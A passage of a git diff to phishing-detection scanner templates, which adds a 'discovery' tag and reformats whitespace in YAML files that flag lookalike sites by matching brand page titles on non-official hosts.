best buy phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://bestbuy.com metadata: max-request: 1 - tags: phishing,bestbuy,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Best Buy | Official Online Store | Shop Now & Save' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,bestbuy,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Best Buy | Official Online Store | Shop Now & Save' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"bestbuy.com")' # digest: 4b0a00483046022100c12e5b9e3ecda739e9b00fb96fdfa3d825d2a27d1c642a7a31e0266d6da4cc6002210089234c1cbdd521b52bc3be005b95bc51808b266028ebb1987729ded4042965a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/bitdefender-phish.yaml b/http/osint/phishing/bitdefender-phish.yaml index 02154027771..8f323b51b71 100644 --- a/http/osint/phishing/bitdefender-phish.yaml +++ b/http/osint/phishing/bitdefender-phish.yaml @@ -1,5 +1,5 @@ -id: bitdefender-phish - +id: bitdefender-phish + info: name: bitdefender phishing Detection author: rxerium @@ -10,27 +10,27 @@ info: - https://bitdefender.com metadata: max-request: 1 - tags: phishing,bitdefender,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Bitdefender - Global Leader in Cybersecurity Software' - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(host,"bitdefender.com")' + tags: phishing,bitdefender,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Bitdefender - Global Leader in Cybersecurity Software' + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(host,"bitdefender.com")' - '!contains(host,"bitdefender.co.uk")' # digest: 4a0a00473045022100f663be7e48b4ada55387a06b8f148a0c2108541320d5a355e7569ea6ca71a1760220202a37c25f60ba7de9bbb3e4c75d45b4f81611f2eeecc2581b529c0f61e873fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/bitwarden-phish.yaml b/http/osint/phishing/bitwarden-phish.yaml index b0c16dfbfc7..3bcef0e6943 100644 --- a/http/osint/phishing/bitwarden-phish.yaml +++ b/http/osint/phishing/bitwarden-phish.yaml @@ -1,5 +1,5 @@ -id: bitwarden-phish - +id: bitwarden-phish + info: name: bitwarden phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://bitwarden.com metadata: max-request: 1 - tags: phishing,bitwarden,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'The password manager trusted by millions | Bitwarden' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,bitwarden,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'The password manager trusted by millions | Bitwarden' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"bitwarden.com")' # digest: 4b0a00483046022100b718f8ca29aee5ed8162796af51de8a661ed6ebba40a2d8f115b3eea9e87a985022100b327785475616a88cb5e399562385001cb6639c9b550c0c4e0a63ae38f65bca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/blender-phish.yaml b/http/osint/phishing/blender-phish.yaml index 163a61d2860..23165045ee7 100644 --- a/http/osint/phishing/blender-phish.yaml +++ b/http/osint/phishing/blender-phish.yaml @@ -1,5 +1,5 @@ -id: blender-phish - +id: blender-phish + info: name: blender phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://blender.org metadata: max-request: 1 - tags: phishing,blender,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'blender.org - Home of the Blender project - Free and Open 3D Creation Software' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,blender,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'blender.org - Home of the Blender project - Free and Open 3D Creation Software' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"blender.org")' # digest: 4a0a00473045022034c2d8d642fdec303e56ae26bebfcf07d78355be75aef4fbe82ca4ff828a2565022100a569abc8433858938f6869410a9c89355f12d6cd1af33c575d3688c0ca57906a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/booking-phish.yaml b/http/osint/phishing/booking-phish.yaml index 8856e4852cb..ad51d16ae01 100644 --- a/http/osint/phishing/booking-phish.yaml +++ b/http/osint/phishing/booking-phish.yaml @@ -1,5 +1,5 @@ -id: booking-phish - +id: booking-phish + info: name: booking phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://booking.com metadata: max-request: 1 - tags: phishing,booking,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Booking.com | Official site | The best hotels, flights, car rentals & accommodations' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,booking,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Booking.com | Official site | The best hotels, flights, car rentals & accommodations' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"booking.com")' # digest: 4b0a00483046022100a7123f63c9db24aa0c3a6ea98f8ae02ba7d50b839a8266de99b88daa9bf290eb022100efef89ddb1fc4df0d072dd9ba60806026c4d2198757f6eb84735e27445999f21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/box-storage-phish.yaml b/http/osint/phishing/box-storage-phish.yaml index 48c47f66af5..41874e6a52b 100644 --- a/http/osint/phishing/box-storage-phish.yaml +++ b/http/osint/phishing/box-storage-phish.yaml @@ -1,5 +1,5 @@ -id: box-phish - +id: box-phish + info: name: box phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://box.com metadata: max-request: 1 - tags: phishing,box-storage,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Secure File Sharing, Storage, and Collaboration | Box' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,box-storage,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Secure File Sharing, Storage, and Collaboration | Box' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"box.com")' # digest: 4a0a00473045022100b243aba16bcb957bb060144698f0ac24788a586c77f41e95643307381411b4710220407dd93d3801eabdeedfaad645359927950788c74f0a044bfaa1db41f7e1ef83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/brave-phish.yaml b/http/osint/phishing/brave-phish.yaml index ed0c2fd00d6..67ecf0e3fcf 100644 --- a/http/osint/phishing/brave-phish.yaml +++ b/http/osint/phishing/brave-phish.yaml @@ -1,5 +1,5 @@ -id: brave-phish - +id: brave-phish + info: name: brave phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://brave.com metadata: max-request: 1 - tags: phishing,brave,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Brave Browser Download | Brave' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,brave,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Brave Browser Download | Brave' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"brave.com")' # digest: 4a0a00473045022002049827873d38d88041397f6c45ac1a79eff62bc67b05510c86f591e836e34302210094779c8a8343b626a0f3322fb1f679be3a2167fd471ae972b9657bc80db9a8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/brighthr-phish.yaml b/http/osint/phishing/brighthr-phish.yaml index efc0e7ece8d..289427e2107 100644 --- a/http/osint/phishing/brighthr-phish.yaml +++ b/http/osint/phishing/brighthr-phish.yaml @@ -1,5 +1,5 @@ -id: brighthr-phish - +id: brighthr-phish + info: name: brighthr phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://brighthr.com metadata: max-request: 1 - tags: phishing,brighthr,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'HR Software For SMEs | Human Resources Software | BrightHR' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,brighthr,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'HR Software For SMEs | Human Resources Software | BrightHR' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"brighthr.com")' # digest: 4a0a00473045022045df3fcdd3ee296e28a91c0522677de8f0e82258fcbec5dbb4989ae18c9476d5022100dffd68ec25985d2a3be0d6ce7957955975a7f098f173da2543be87d187fe08d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/ccleaner-phish.yaml b/http/osint/phishing/ccleaner-phish.yaml index 0489c246922..9786f34048d 100644 --- a/http/osint/phishing/ccleaner-phish.yaml +++ b/http/osint/phishing/ccleaner-phish.yaml @@ -1,5 +1,5 @@ -id: ccleaner-phish - +id: ccleaner-phish + info: name: ccleaner phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://ccleaner.com metadata: max-request: 1 - tags: phishing,ccleaner,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'CCleaner Makes Your Computer Faster & More Secure | Official Website' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,ccleaner,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'CCleaner Makes Your Computer Faster & More Secure | Official Website' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"ccleaner.com")' # digest: 4a0a0047304502205b429ea510769e88bfe22eab9bad687aeac7ebd32cc003e8e9b6f84ea3d86d47022100df653567b66b513c62c50a99a79122a709bf6c8a45d2519fc63614cb15f8332e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/chase-phish.yaml b/http/osint/phishing/chase-phish.yaml index f1f8233220b..fa3f201d4ac 100644 --- a/http/osint/phishing/chase-phish.yaml +++ b/http/osint/phishing/chase-phish.yaml @@ -1,5 +1,5 @@ -id: Chase-phish - +id: Chase-phish + info: name: Chase phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://chase.com metadata: max-request: 1 - tags: phishing,Chase,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Credit Card, Mortgage, Banking, Auto | Chase Online | Chase.com' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,Chase,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Credit Card, Mortgage, Banking, Auto | Chase Online | Chase.com' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"chase.com")' # digest: 4a0a00473045022064a584fd9d0d6db0f4a24ea28b66b5f917ece88cfa73f1543fcdd0a6eb12f7320221008fa676bf3aa94bef74a3d49acbfd5ea0d7c014976883fd88645113ecee8ab5f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/chrome-phish.yaml b/http/osint/phishing/chrome-phish.yaml index 2c06725a046..d4a6b489910 100644 --- a/http/osint/phishing/chrome-phish.yaml +++ b/http/osint/phishing/chrome-phish.yaml @@ -1,5 +1,5 @@ -id: chrome-phish - +id: chrome-phish + info: name: chrome phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://www.google.com/intl/en_uk/chrome/ metadata: max-request: 1 - tags: phishing,chrome,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Google Chrome – Download the fast, secure browser from Google' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,chrome,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Google Chrome – Download the fast, secure browser from Google' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"google.com")' # digest: 4a0a0047304502206f24df7b8d17a2d19e6b2d458fe3ea02fd59aef4927b982722e0f04c2f319120022100bcc0ec835a7cf6b495d9a7d462c4b5bd02afdc357279371495abbfafcdfa7948:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/costa-phish.yaml b/http/osint/phishing/costa-phish.yaml index c689d1aafd7..b8f42c3046d 100644 --- a/http/osint/phishing/costa-phish.yaml +++ b/http/osint/phishing/costa-phish.yaml @@ -1,5 +1,5 @@ -id: costa-phish - +id: costa-phish + info: name: costa phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://costa.co.uk metadata: max-request: 1 - tags: phishing,costa,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'The Nation's Favourite Coffee Shop | Costa Coffee' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,costa,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'The Nation's Favourite Coffee Shop | Costa Coffee' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"costa.co.uk")' # digest: 490a00463044022007f80a771ee8ff88b448f1989b6f41733610676805c510ff20b44eeddba6c1db022075575472a9ce451f62138584bd11df41ee95eebcf99dc2484ace2982575e704d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/dashlane-phish.yaml b/http/osint/phishing/dashlane-phish.yaml index ae2d4c470c0..31528e2c40e 100644 --- a/http/osint/phishing/dashlane-phish.yaml +++ b/http/osint/phishing/dashlane-phish.yaml @@ -1,5 +1,5 @@ -id: dashlane-phish - +id: dashlane-phish + info: name: dashlane phishing Detection author: rxerium @@ -10,28 +10,28 @@ info: - https://dashlane.com metadata: max-request: 1 - tags: phishing,dashlane,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Dashlane Password Manager' - - 'Dashlane Password Manager safeguards businesses & people with easy-to-use, powerful features. Protect & manage passwords and passkeys in one secure solution.' - condition: and - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,dashlane,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Dashlane Password Manager' + - 'Dashlane Password Manager safeguards businesses & people with easy-to-use, powerful features. Protect & manage passwords and passkeys in one secure solution.' + condition: and + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"dashlane.com")' # digest: 4b0a00483046022100e5da0da4f2dfd009fe0dd8b6769291a61678d82b5cb8755d01e7f35db79523c002210094111931e38eab1f372f96511cf2a3b92bbe904803a10449a769612f4f689618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/deezer-phish.yaml b/http/osint/phishing/deezer-phish.yaml index 798eed9548e..debe31ed69f 100644 --- a/http/osint/phishing/deezer-phish.yaml +++ b/http/osint/phishing/deezer-phish.yaml @@ -1,5 +1,5 @@ -id: deezer-phish - +id: deezer-phish + info: name: deezer phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://deezer.com metadata: max-request: 1 - tags: phishing,deezer,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Deezer | Listen to music | Online music streaming platform' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,deezer,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Deezer | Listen to music | Online music streaming platform' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"deezer.com")' # digest: 4b0a00483046022100adc4a683fea8a6f65907a69483bb8035ba7b82c0e249736b64c20586dd08d04e022100e2b6f90be1ef5a4f78f7fe0cdc4cf88f9b10f5e10b4bae1e0cac3168bbc272d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/deliveroo-phish.yaml b/http/osint/phishing/deliveroo-phish.yaml index 473996a1692..68f92601772 100644 --- a/http/osint/phishing/deliveroo-phish.yaml +++ b/http/osint/phishing/deliveroo-phish.yaml @@ -1,5 +1,5 @@ -id: deliveroo-phish - +id: deliveroo-phish + info: name: deliveroo phishing Detection author: rxerium @@ -10,27 +10,27 @@ info: - https://deliveroo.co.uk metadata: max-request: 1 - tags: phishing,deliveroo,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Deliveroo - Takeaway Food Delivery from Local Restaurants & Shops' - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(host,"deliveroo.com")' + tags: phishing,deliveroo,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Deliveroo - Takeaway Food Delivery from Local Restaurants & Shops' + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(host,"deliveroo.com")' - '!contains(host,"deliveroo.co.uk")' # digest: 4a0a00473045022100a437f371b41b07dec925f14ad04f26479152cde608a2b29326fd01627cc0338602205543167b924d9a7a3fe28be24b9ea01e7dd73a9494f50d03c9cf02c6c99515ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/digital-ocean-phish.yaml b/http/osint/phishing/digital-ocean-phish.yaml index c88855c3de1..53dd114c540 100644 --- a/http/osint/phishing/digital-ocean-phish.yaml +++ b/http/osint/phishing/digital-ocean-phish.yaml @@ -1,5 +1,5 @@ -id: digital-ocean-phish - +id: digital-ocean-phish + info: name: digital ocean phishing Detection author: rxerium @@ -10,29 +10,29 @@ info: - https://digitalocean.com metadata: max-request: 1 - tags: phishing,digital-ocean,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'DigitalOcean | Cloud Infrastructure for Developers' - - 'DigitalOcean' - condition: and - - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,digital-ocean,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'DigitalOcean | Cloud Infrastructure for Developers' + - 'DigitalOcean' + condition: and + + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"digitalocean.com")' # digest: 4b0a00483046022100c176f538024fa8118fedd1b74e7cefe59817ba300dd0864185c3d23b1ea35f69022100a873bb6c5bb36653700cf92b4ef68ab2a690ea7e65c81e9b47f730dd4e34f96e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/discord-phish.yaml b/http/osint/phishing/discord-phish.yaml index 95986f373d0..94ea060fe8b 100644 --- a/http/osint/phishing/discord-phish.yaml +++ b/http/osint/phishing/discord-phish.yaml @@ -1,5 +1,5 @@ -id: Discord-phish - +id: Discord-phish + info: name: Discord phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://discord.com metadata: max-request: 1 - tags: phishing,discord,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Discord | Your Place to Talk and Hang Out' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,discord,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Discord | Your Place to Talk and Hang Out' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"discord.com")' # digest: 4b0a004830460221008b4af61a977a70ca7f0affe3b9ada4eb19165174e4d0d3e8e6dd65849fae66cd022100c121ac3526b64e5fbcf18cf23e769e56ed295472db8cffe1a24f326f32521126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/disneyplus-phish.yaml b/http/osint/phishing/disneyplus-phish.yaml index 473a879a22b..342863dd13a 100644 --- a/http/osint/phishing/disneyplus-phish.yaml +++ b/http/osint/phishing/disneyplus-phish.yaml @@ -1,5 +1,5 @@ -id: disneyplus-phish - +id: disneyplus-phish + info: name: disneyplus phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://disneyplus.com metadata: max-request: 1 - tags: phishing,disneyplus,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Disney+ | Stream new Originals, blockbusters and series' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,disneyplus,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Disney+ | Stream new Originals, blockbusters and series' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"disneyplus.com")' # digest: 490a0046304402204fa3e8fc7f9b3ddaf52f33790d6a1c2929a35321013dd95251fcb53eebc1d9df0220585f0edd97534a0f07d175f855acf1cca1aa0cfba0909bc25d8d91c1d8759095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/dropbox-phish.yaml b/http/osint/phishing/dropbox-phish.yaml index dad74d88fad..5a441ec7eda 100644 --- a/http/osint/phishing/dropbox-phish.yaml +++ b/http/osint/phishing/dropbox-phish.yaml @@ -1,5 +1,5 @@ -id: dropbox-phish - +id: dropbox-phish + info: name: dropbox phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://dropbox.com metadata: max-request: 1 - tags: phishing,dropbox,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Dropbox is a home for all of your work. You can store and share files, collaborate on projects and bring your best ideas to life, whether you’re working alone or as part of a team.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,dropbox,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Dropbox is a home for all of your work. You can store and share files, collaborate on projects and bring your best ideas to life, whether you’re working alone or as part of a team.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"dropbox.com")' # digest: 490a0046304402205afb6bcac9c6ed03013c7b7c309457e8d703bdc3b62c1955f8c4eee629c186e30220394a4950b9e4d5d20dec0c741dd5c90eb2648102657756f20655c00ec305c148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/duckduckgo-phish.yaml b/http/osint/phishing/duckduckgo-phish.yaml index e26cc1a0ac6..c31b7bd11d6 100644 --- a/http/osint/phishing/duckduckgo-phish.yaml +++ b/http/osint/phishing/duckduckgo-phish.yaml @@ -1,5 +1,5 @@ -id: duckduckgo-phish - +id: duckduckgo-phish + info: name: duckduckgo phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://duckduckgo.com metadata: max-request: 1 - tags: phishing,duckduckgo,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'DuckDuckGo — Privacy, simplified.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,duckduckgo,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'DuckDuckGo — Privacy, simplified.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"duckduckgo.com")' # digest: 4a0a004730450220496c90cb6d89031ef2eb1ffd6d60f051cec1d5e9e93c0d89379f1d007cf6ff3d022100c2f9e408d91f0c6d8f7bb0382653a5e7f680d82d2f96050cea3254c573fab85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/ebay-phish.yaml b/http/osint/phishing/ebay-phish.yaml index f6b09713dbb..dbfaa7c33fe 100644 --- a/http/osint/phishing/ebay-phish.yaml +++ b/http/osint/phishing/ebay-phish.yaml @@ -1,5 +1,5 @@ -id: ebay-phish - +id: ebay-phish + info: name: ebay phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://ebay.com metadata: max-request: 1 - tags: phishing,ebay,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Electronics, Cars, Fashion, Collectibles & More | eBay' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,ebay,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Electronics, Cars, Fashion, Collectibles & More | eBay' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"ebay.com")' # digest: 490a004630440220467a525f5b55d28cf71172766f9c3800974bbda9e8340ba44636143e60f84ab702202603e2af0fea7d57a3fb8118885332d6d691c372160ed6101c486c6feb0eac4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/edge-phish.yaml b/http/osint/phishing/edge-phish.yaml index 600b3081460..58b547bc3c6 100644 --- a/http/osint/phishing/edge-phish.yaml +++ b/http/osint/phishing/edge-phish.yaml @@ -1,5 +1,5 @@ -id: edge-phish - +id: edge-phish + info: name: edge phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://www.microsoft.com/en-us/edge/download?form=MA13FJ&ch=1 metadata: max-request: 1 - tags: phishing,edge,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in - edge Accounts' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,edge,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in - edge Accounts' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"microsoft.com")' # digest: 4a0a0047304502200ec87ab3137ac6d316e9abfa3bc65b6c561b612f45c1f92af940f8f497311b57022100d606c44f7521598270de2e06847bc3c0dd6f28aeef44450a38a5fcdc6da91096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/ee-mobile-phish.yaml b/http/osint/phishing/ee-mobile-phish.yaml index 4d1b4f9a34d..25cd7369f27 100644 --- a/http/osint/phishing/ee-mobile-phish.yaml +++ b/http/osint/phishing/ee-mobile-phish.yaml @@ -1,5 +1,5 @@ -id: ee-mobile-phish - +id: ee-mobile-phish + info: name: ee phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://ee.co.uk metadata: max-request: 1 - tags: phishing,ee,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Superfast 5G & 4G Phones, Tablets and Fibre Broadband | EE' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,ee,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Superfast 5G & 4G Phones, Tablets and Fibre Broadband | EE' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"ee.co.uk")' # digest: 490a0046304402203d5c335219abe1c64cbf751f450fcda42cf2253bb678ec1b2b287270a82abac702204cc88149088babbf7738d7fe97b6ffc1774fcff120d5d6c366aad491e3521b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/eset-phish.yaml b/http/osint/phishing/eset-phish.yaml index 9b913e569fe..15f08ec7b7e 100644 --- a/http/osint/phishing/eset-phish.yaml +++ b/http/osint/phishing/eset-phish.yaml @@ -1,5 +1,5 @@ -id: eset-phish - +id: eset-phish + info: name: eset phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://eset.com metadata: max-request: 1 - tags: phishing,eset,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Malware Protection & Internet Security | 